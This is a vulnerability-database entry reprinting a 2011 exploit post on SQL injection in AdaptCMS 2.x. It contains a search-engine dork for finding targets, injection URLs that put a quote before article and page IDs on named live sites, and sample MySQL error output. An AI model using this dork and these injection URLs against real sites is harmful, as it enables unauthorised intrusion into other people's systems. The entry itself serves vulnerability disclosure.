Search...

AdaptCMS 2.x SQL Injection Vulnerability

2011-11-27T00:00:00

ID SECURITYVULNS:DOC:27353
Type securityvulns
Reporter Securityvulns
Modified 2011-11-27T00:00:00

Description

========================================================================= AdaptCMS 2.x SQL Injection Vulnerability =========================================================================

:-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : AdaptCMS 2.x SQL Injection Vulnerability : # Date : 23 November 2011 : # Author : X-Cisadane : # Software Link : http://www.adaptcms.com : # Version : 2.0.0 and 2.0.1 : # Category : Web Applications : # Vulnerability : SQL Injection : # Tested On : Google Chrome 14.0.835 (Windows) : # Dorks : intext:"Powered by AdaptCMS" OR Powered by AdaptCMS : # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, Winda Utari, Anharku, Array XCrew, Remick Kuzmanovic

:-------------------------------------------------------------------------------------------------------------------------:

POC : SQL Injection Vulnerability

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/victim site/public_html/directory/config.php on line 262

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/victim site/public_html/directory/config.php on line 293

Open Victim Website : http://<site>/<AdaptCMS Installation Path>/article/ 'Article ID/Page Name/Article Title Example : http://www.adaptcms.com/article/'66/Blog/AdaptCMS-20-March-26th http://www.adaptcms.com/article/'75/News/AdaptCMS-200-Released http://www.rock.insanevisions.com/article/'293/Album/Pink-Floyd-Animals http://www.insanevisions.com/article/'294/News/AdaptCMS-202-Update

Open Victim Website : http://<site>/<AdaptCMS Installation Path>/page/'Page ID/Page Title Example : http://www.adaptcms.com/page/'33/downloads http://www.rock.insanevisions.com/page/'1/About-Us/ http://www.insanevisions.com/page/'3/Downloads/

-= Regards =- Dwi a.k.a X-Cisadane

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:27353", "bulletinFamily": "software", "title": "AdaptCMS 2.x SQL Injection Vulnerability", "description": " =========================================================================\r\nAdaptCMS 2.x SQL Injection Vulnerability\r\n=========================================================================\r\n\r\n\r\n:-------------------------------------------------------------------------------------------------------------------------:\r\n : # Exploit Title : AdaptCMS 2.x SQL Injection Vulnerability\r\n: # Date : 23 November 2011\r\n: # Author : X-Cisadane\r\n: # Software Link : http://www.adaptcms.com\r\n : # Version : 2.0.0 and 2.0.1\r\n: # Category : Web Applications\r\n: # Vulnerability : SQL Injection\r\n: # Tested On : Google Chrome 14.0.835 (Windows)\r\n: # Dorks : intext:"Powered by AdaptCMS" OR Powered by AdaptCMS\r\n: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane,\r\nBorneo Crew,\r\nDunia Santai, Jiban Crew, Winda Utari, Anharku, Array XCrew, Remick\r\nKuzmanovic\r\n\r\n:-------------------------------------------------------------------------------------------------------------------------:\r\n\r\n POC :\r\nSQL Injection Vulnerability\r\n\r\n Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result\r\nresource in /home/victim site/public_html/directory/config.php on line 262\r\n\r\n Warning: mysql_num_rows(): supplied argument is not a valid MySQL result\r\nresource in /home/victim site/public_html/directory/config.php on line 293\r\n\r\n - Open Victim Website : http://<site>/<AdaptCMS Installation Path>/article/\r\n*'Article ID*/Page Name/Article Title\r\n Example :\r\nhttp://www.adaptcms.com/article/'66/Blog/AdaptCMS-20-March-26th\r\n http://www.adaptcms.com/article/'75/News/AdaptCMS-200-Released\r\n http://www.rock.insanevisions.com/article/'293/Album/Pink-Floyd-Animals\r\n http://www.insanevisions.com/article/'294/News/AdaptCMS-202-Update\r\n\r\n - Open Victim Website : http://<site>/<AdaptCMS Installation Path>/page/*'Page\r\nID*/Page Title\r\n Example :\r\nhttp://www.adaptcms.com/page/'33/downloads\r\n http://www.rock.insanevisions.com/page/'1/About-Us/\r\n http://www.insanevisions.com/page/'3/Downloads/\r\n\r\n-= Regards =-\r\nDwi a.k.a X-Cisadane", "published": "2011-11-27T00:00:00", "modified": "2011-11-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27353", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "edition": 1, "viewCount": 11, "enchantments": {"score": {"value": 1.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12054"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.1}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645683329}}